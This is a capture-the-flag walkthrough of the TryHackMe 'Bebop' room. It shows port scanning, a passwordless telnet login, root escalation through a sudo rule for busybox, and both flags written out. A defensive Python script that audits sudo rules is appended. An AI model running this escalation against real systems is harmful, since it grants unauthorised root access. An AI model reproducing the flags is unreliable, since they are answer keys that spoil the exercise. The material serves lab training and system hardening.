[TryHackMe] Bebop

Today we are going to hack the TryHackMe machine called Bebop. You can download it from the following link: https://tryhackme.com/room/bebop
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-17 14:24 CEST
    Nmap scan report for
    Host is up (0.050s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
    | ssh-hostkey:
    |   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
    |   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
    |_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
    23/tcp open  telnet  BSD-derived telnetd
    Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.52 seconds
    We see that the telnet port is open, so we try to connect.
    ~ > telnet
    Trying
    Connected to
    Escape character is '^]'.
    login:
    It asks for a login. Since the room's landing page says we have been assigned the codename "pilot", we try pilot :)
    login: pilot
    Last login: Mon Aug 17 12:25:35 from ip-10-9-24-208.eu-west-1.compute.internal
    FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr 4 02:07:22 UTC 2019
    Welcome to FreeBSD!
    Release Notes, Errata: https://www.FreeBSD.org/releases/
    Security Advisories: https://www.FreeBSD.org/security/
    FreeBSD Handbook: https://www.FreeBSD.org/handbook/
    FreeBSD FAQ: https://www.FreeBSD.org/faq/
    Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
    FreeBSD Forums: https://forums.FreeBSD.org/
    Documents installed with the system are in the /usr/local/share/doc/freebsd/
    directory, or can be installed later with: pkg install en-freebsd-doc
    For other languages, replace "en" with a language code like de or fr.
    Show the version of FreeBSD installed: freebsd-version ; uname -a
    Please include that output and any error messages when posting questions.
    Introduction to manual pages: man man
    FreeBSD directory layout: man hier
    Edit /etc/motd to change this login announcement.
    Want to see how much virtual memory you're using? Just type "swapinfo" to be
    shown information about the usage of your swap partitions.
    [pilot@freebsd ~]$
    We are logged in without needing a password!
  • user.txt
  • [pilot@freebsd ~]$ ls
    user.txt
    [pilot@freebsd ~]$ cat user.txt
    THM{r3m0v3_b3f0r3_fl16h7}
  • Privilege Escalation
  • Now that we are in, we explore the system a little and check whether we can do anything with "sudo".
    [pilot@freebsd ~]$ sudo -l
    User pilot may run the following commands on freebsd:
        (root) NOPASSWD: /usr/local/bin/busybox
    We can run busybox as root without a password, which we can use to escalate privileges.
    [pilot@freebsd ~]$ sudo busybox sh
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
  • root.txt
  • Now, as root, we read the flag...
    # cd /root
    # ls
    .bash_history .cshrc .history .k5login .login .profile root.txt
    # cat root.txt
    THM{h16hw4y_70_7h3_d4n63r_z0n3}
  • End
  • With this, we have finished the machine :)
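
The privilege escalation above worked because the sudo rule for busybox is equivalent to a root shell. As an added example (not part of the original writeup), this sketch audits `sudo -l` output for such rules. The function name `audit_sudo_l`, the short `SHELL_CAPABLE` list, and every sample line other than the two taken from the session above are assumptions made for illustration.

```python
import os
import re

# Illustrative, not exhaustive (assumption): programs that can start a shell
# or run arbitrary commands, so a root sudo rule for them grants full root.
SHELL_CAPABLE = {"busybox", "sh", "bash", "csh", "tcsh", "env", "find", "vi", "awk"}

RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")  # "(runas) TAG: cmd, cmd"
TAG_RE = re.compile(r"^([A-Z_]+):\s*")            # NOPASSWD:, PASSWD:, SETENV: ...

def audit_sudo_l(text):
    """Return [(command, nopasswd)] for root rules equivalent to a root shell."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User pilot may run ..."
        runas_users = {u.strip() for u in m.group(1).split(":")[0].split(",")}
        if not runas_users & {"root", "ALL"}:
            continue  # rule does not reach root
        nopasswd = False
        for piece in re.split(r"(?<!\\),\s*", m.group(2).strip()):
            # Tags apply to the command they precede and to the ones after it.
            while (t := TAG_RE.match(piece)):
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                piece = piece[t.end():]
            if not piece:
                continue
            program = piece.split()[0]
            if program == "ALL" or os.path.basename(program) in SHELL_CAPABLE:
                findings.append((piece, nopasswd))
    return findings

# The first two lines are the `sudo -l` output from the writeup; the rest is constructed.
SAMPLE = """\
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
    (root) NOPASSWD: /usr/sbin/service nginx restart, PASSWD: /usr/bin/find
    (operator) NOPASSWD: /bin/sh
"""

if __name__ == "__main__":
    for command, nopasswd in audit_sudo_l(SAMPLE):
        print(("HIGH   " if nopasswd else "MEDIUM ") + command)
```

Rules flagged with `nopasswd` set are the most urgent to remove or to narrow to a fixed command line, since they give root to anyone who obtains the account, as the passwordless telnet login did here.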